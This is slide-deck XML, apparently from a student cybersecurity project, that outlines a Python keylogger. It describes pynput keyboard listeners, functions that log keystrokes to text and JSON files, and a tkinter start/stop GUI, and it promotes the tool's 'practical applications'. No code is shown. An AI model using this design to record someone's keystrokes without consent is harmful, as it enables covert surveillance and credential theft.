              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l"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on_press(key): Logs the key press and hold events, updates keys_used, and generates the JSON file</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on_release(key): Logs the key release event, updates keys_used, generates the JSON file, and updates the text log.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1488694"/>
        <a:ext cx="1374425" cy="1488694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C31DE76-D49C-451C-8907-4C861ADEA3F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="68427" y="223304"/>
          <a:ext cx="1239337" cy="123933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05DCDAA-6710-47A6-85D6-3828FE2432E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1416542"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just" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>5.File Handling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="5334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generate_text_log(key): Writes the accumulated keystrokes to key_log.txt.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="5334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generate-Json-file(keys used): Writes the keystroke events to key_log.Json in JSON format</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1416542" y="1488694"/>
        <a:ext cx="1374425" cy="1488694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77C3B04E-8443-4F0A-AE4E-68EBD24E3328}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1484086" y="223304"/>
          <a:ext cx="1239337" cy="12393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D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2832200"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p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>6.GUI </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Functions</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</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start_keylogger(): Starts the keylogger and updates the GUI status.</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Stop_keylogger(): Stops the keylogger and  updates the GUI  status.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="8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dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2832200" y="1488694"/>
        <a:ext cx="1374425" cy="1488694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9EBEFC0-F5EF-48C3-A240-EBC14D2D5BAB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2899744" y="223304"/>
          <a:ext cx="1239337" cy="123933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BEAA052-B204-4B8E-999B-BBCA56A2AB22}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="168300" y="2977388"/>
          <a:ext cx="3870909" cy="558260"/>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385C0-CD6A-4D3D-A231-E0D94107ABDB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-169308" y="172483"/>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1.Libraries and Modules</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2" y="398228"/>
        <a:ext cx="790107" cy="338618"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{62BFA832-8A1D-46BD-8840-16CF606227EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4524018" y="-3730736"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>tkinter: Used to create the GUI.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>pynput.keyboard: Used to listen for keyboard events (key presses and releases).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" kern="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Json: Used to save the logged keystrokes in JSON format.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="790108" y="38989"/>
        <a:ext cx="8165677" cy="662041"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{38638AFD-E64D-4984-AF82-861D40FD21A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-169308" y="1175258"/>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2.Variables:</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2" y="1401003"/>
        <a:ext cx="790107" cy="338618"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1E83BB1E-9F54-4A93-B6D6-4241384B78A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4524018" y="-2727960"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>keys_used: A list to store the keys along with their state (pressed, held, released).</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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>flag: A boolean flag to manage the state of key press and hold.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>keys: A string to accumulate all keystrokes for logging in a text file.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="790108" y="1041765"/>
        <a:ext cx="8165677" cy="662041"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9A38E2D1-D590-4467-8968-9CD0FFCA7F83}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-169308" y="2418592"/>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3.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Functions</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2" y="2644337"/>
        <a:ext cx="790107" cy="338618"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{500CFD40-23FE-4DD1-B3ED-76499482957A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3998547" y="-1158984"/>
          <a:ext cx="1785924" cy="817278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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>generate_text_log(key): Writes the accumulated keystrokes to a text file (key_log.txt).</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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>generate_json_file(keys_used): Writes the logged keystrokes to a JSON file (key_log.json).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>on_press(key): Handles key press events, updates the keys_used list, and calls generate_json_file.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>on_release(key): Handles key release events, updates the keys_used list, and calls both generate_json_file and generate_text_log.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>start_keylogger(): Initializes and starts the keylogger, updates the GUI to reflect the keylogger's running state.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>stop_keylogger(): Stops the keylogger and updates the GUI to reflect the keylogger's stopped state.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="805116" y="2121629"/>
        <a:ext cx="8085605" cy="1611560"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3D6B3199-C9BC-4A59-9AC4-2B4E7EDED6CC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-169308" y="3841182"/>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4.GUI Components</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2" y="4066927"/>
        <a:ext cx="790107" cy="338618"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ECF9FEDD-7A02-4D67-AC3E-D8DC933BA48C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4524018" y="238734"/>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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Label: Displays messages to the user about the keylogger’s state.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a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Button: Two buttons to start and stop</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="790108" y="4008460"/>
        <a:ext cx="8165677" cy="66204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2">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AB7E7C8-EB25-42AE-89FF-C149E899A5FF}"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775115-5E82-4914-81CB-4F2A8F57CE6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775115-5E82-4914-81CB-4F2A8F57CE66}"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C775115-5E82-4914-81CB-4F2A8F57CE66}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>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775115-5E82-4914-81CB-4F2A8F57CE66}"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DAYKIRAN1112/cybersecurity.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971800"/>
            <a:ext cx="2125980" cy="382156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204"/>
                <a:cs typeface="Trebuchet MS" panose="020B0603020202020204"/>
              </a:rPr>
              <a:t>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6" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419725" y="1981200"/>
            <a:ext cx="4105275" cy="76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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>D UDAY KIRAN</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000"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5837" y="29090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6675" y="57152"/>
            <a:ext cx="8620125" cy="632224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WOW</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="85" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IN</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OUR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SOLUTION</a:t>
            </a:r>
            <a:endParaRPr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Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="835410"/>
            <a:ext cx="8839200" cy="7647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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The solution’s wow factor comes from its blend of functionality, ease of use, and educational value. If effectively combines a simple yet powerful GUI with robust key logging capabilities, making it a useful tool both for practical applications and as a learning resource.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526030" y="1746234"/>
            <a:ext cx="6610350" cy="49188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ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.Seamless User Interaction:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:ln>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>User-Friendly Interfaces: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The application’s GUI makes it straight forward for users to interact with the keylogger, making the technical process of logging keystrokes approachable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.Dual Logging Mechanism Text and JSON:</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Offering two formats for logging the key events increases the utility of the data captured. Users can quickly read through the text file or utilize the JSON file for deeper analysis, perhaps integrating with other data analysis tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
